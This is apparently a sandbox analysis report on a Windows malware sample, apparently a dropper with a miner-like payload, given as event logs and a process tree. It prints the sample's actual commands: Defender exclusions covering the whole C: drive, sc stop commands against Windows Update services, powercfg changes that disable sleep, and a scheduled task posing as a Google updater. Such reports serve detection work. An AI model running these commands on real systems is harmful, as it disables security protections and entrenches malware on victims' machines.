Token: SeShutdownPrivilege	2096	svchost.exe
Token: SeSystemEnvironmentPrivilege	2096	svchost.exe
Token: SeUndockPrivilege	2096	svchost.exe
Token: SeManageVolumePrivilege	2096	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2096	svchost.exe
Token: SeIncreaseQuotaPrivilege	2096	svchost.exe
Token: SeSecurityPrivilege	2096	svchost.exe
Token: SeTakeOwnershipPrivilege	2096	svchost.exe
Token: SeLoadDriverPrivilege	2096	svchost.exe
Token: SeSystemtimePrivilege	2096	svchost.exe
Token: SeBackupPrivilege	2096	svchost.exe
Token: SeRestorePrivilege	2096	svchost.exe
Token: SeShutdownPrivilege	2096	svchost.exe
Token: SeSystemEnvironmentPrivilege	2096	svchost.exe
Token: SeUndockPrivilege	2096	svchost.exe
Token: SeManageVolumePrivilege	2096	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2096	svchost.exe
Token: SeIncreaseQuotaPrivilege	2096	svchost.exe
Token: SeSecurityPrivilege	2096	svchost.exe
Token: SeTakeOwnershipPrivilege	2096	svchost.exe
Token: SeLoadDriverPrivilege	2096	svchost.exe
Token: SeSystemtimePrivilege	2096	svchost.exe
Token: SeBackupPrivilege	2096	svchost.exe
Token: SeRestorePrivilege	2096	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4980	Conhost.exe
1552	Conhost.exe
2360	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4244 wrote to memory of 3088	4244	af4b66ff9b1f5830080860380efa81e4.exe	85
PID 4244 wrote to memory of 3088	4244	af4b66ff9b1f5830080860380efa81e4.exe	85
PID 4244 wrote to memory of 3088	4244	af4b66ff9b1f5830080860380efa81e4.exe	85
PID 4244 wrote to memory of 3448	4244	af4b66ff9b1f5830080860380efa81e4.exe	86
PID 4244 wrote to memory of 3448	4244	af4b66ff9b1f5830080860380efa81e4.exe	86
PID 3088 wrote to memory of 3144	3088	MpDefenderCoreService.exe	87
PID 3088 wrote to memory of 3144	3088	MpDefenderCoreService.exe	87
PID 3088 wrote to memory of 3144	3088	MpDefenderCoreService.exe	87
PID 2620 wrote to memory of 3120	2620	cmd.exe	92
PID 2620 wrote to memory of 3120	2620	cmd.exe	92
PID 2620 wrote to memory of 2800	2620	cmd.exe	93
PID 2620 wrote to memory of 2800	2620	cmd.exe	93
PID 2620 wrote to memory of 632	2620	cmd.exe	94
PID 2620 wrote to memory of 632	2620	cmd.exe	94
PID 2620 wrote to memory of 380	2620	cmd.exe	95
PID 2620 wrote to memory of 380	2620	cmd.exe	95
PID 2620 wrote to memory of 2128	2620	cmd.exe	96
PID 2620 wrote to memory of 2128	2620	cmd.exe	96
PID 3448 wrote to memory of 2652	3448	twain32.exe	99
PID 3060 wrote to memory of 1720	3060	cmd.exe	102
PID 3060 wrote to memory of 1720	3060	cmd.exe	102
PID 3060 wrote to memory of 1352	3060	cmd.exe	103
PID 3060 wrote to memory of 1352	3060	cmd.exe	103
PID 3060 wrote to memory of 3892	3060	cmd.exe	104
PID 3060 wrote to memory of 3892	3060	cmd.exe	104
PID 3060 wrote to memory of 924	3060	cmd.exe	105
PID 3060 wrote to memory of 924	3060	cmd.exe	105
PID 2652 wrote to memory of 612	2652	dialer.exe	5
PID 2652 wrote to memory of 684	2652	dialer.exe	7
PID 2652 wrote to memory of 960	2652	dialer.exe	12
PID 2652 wrote to memory of 316	2652	dialer.exe	13
PID 2652 wrote to memory of 412	2652	dialer.exe	14
PID 2652 wrote to memory of 1056	2652	dialer.exe	16
PID 2652 wrote to memory of 1064	2652	dialer.exe	17
PID 2652 wrote to memory of 1080	2652	dialer.exe	18
PID 2652 wrote to memory of 1192	2652	dialer.exe	19
PID 2652 wrote to memory of 1208	2652	dialer.exe	20
PID 2652 wrote to memory of 1292	2652	dialer.exe	21
PID 2652 wrote to memory of 1312	2652	dialer.exe	22
PID 2652 wrote to memory of 1384	2652	dialer.exe	23
PID 2652 wrote to memory of 1400	2652	dialer.exe	24
PID 2652 wrote to memory of 1468	2652	dialer.exe	25
PID 2652 wrote to memory of 1492	2652	dialer.exe	26
PID 2652 wrote to memory of 1512	2652	dialer.exe	27
PID 2652 wrote to memory of 1652	2652	dialer.exe	28
PID 2652 wrote to memory of 1696	2652	dialer.exe	29
PID 2652 wrote to memory of 1732	2652	dialer.exe	30
PID 2652 wrote to memory of 1808	2652	dialer.exe	31
PID 2652 wrote to memory of 1828	2652	dialer.exe	32
PID 2652 wrote to memory of 1932	2652	dialer.exe	33
PID 2652 wrote to memory of 1960	2652	dialer.exe	34
PID 2652 wrote to memory of 1968	2652	dialer.exe	35
PID 2652 wrote to memory of 2036	2652	dialer.exe	36
PID 2652 wrote to memory of 2060	2652	dialer.exe	37
PID 2652 wrote to memory of 2096	2652	dialer.exe	38
PID 2652 wrote to memory of 2216	2652	dialer.exe	40
PID 2652 wrote to memory of 2332	2652	dialer.exe	41
PID 2652 wrote to memory of 2492	2652	dialer.exe	42
PID 2652 wrote to memory of 2504	2652	dialer.exe	43
PID 2652 wrote to memory of 2672	2652	dialer.exe	44
PID 2652 wrote to memory of 2700	2652	dialer.exe	45
PID 2652 wrote to memory of 2724	2652	dialer.exe	46
PID 2652 wrote to memory of 2780	2652	dialer.exe	47
PID 2652 wrote to memory of 2792	2652	dialer.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1192
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2940
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:3172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1468
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2036

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2780

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2844

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3456

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3540
- C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe
  "C:\Users\Admin\AppData\Local\Temp\af4b66ff9b1f5830080860380efa81e4.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe
    "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3088
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\fontwin\n5YK.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:3144
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\fontwin\eUNvwPScHJBqRVxJMAbWN67h5pJ3FqxG.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2572
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4980
      - C:\fontwin\MsServerHost.exe
        
        "C:\fontwin/MsServerHost.exe"
        6⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Modifies registry class
        
        PID:2888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkndfk0d\lkndfk0d.cmdline"
        7⤵
        Drops file in System32 directory
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1552
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3A.tmp" "c:\Windows\System32\CSC5E2D5D3AA49F40418C336E32307AFD6A.TMP"
        8⤵
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:64
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\winlogon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4500
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\fontdrvhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\MsServerHost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3284
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\reports\fontdrvhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2776
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rqERLoI5WW.bat"
        7⤵
        
        PID:1600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2360
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5716
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:6104
        
        C:\Program Files\Crashpad\reports\fontdrvhost.exe
        
        "C:\Program Files\Crashpad\reports\fontdrvhost.exe"
        8⤵
        Executes dropped EXE
        
        PID:1592
- - C:\Users\Admin\AppData\Local\Temp\twain32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3120
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2800
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:632
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:380
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2128
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:924
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5056
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:3264
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4564
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2176
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:3780
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4428
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:552
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3588
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1368
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2252
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4084
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2320
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1760
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2408
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4276
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:876
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2776
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4440
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1264
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2924

C:\Windows\system32\svchost.exe
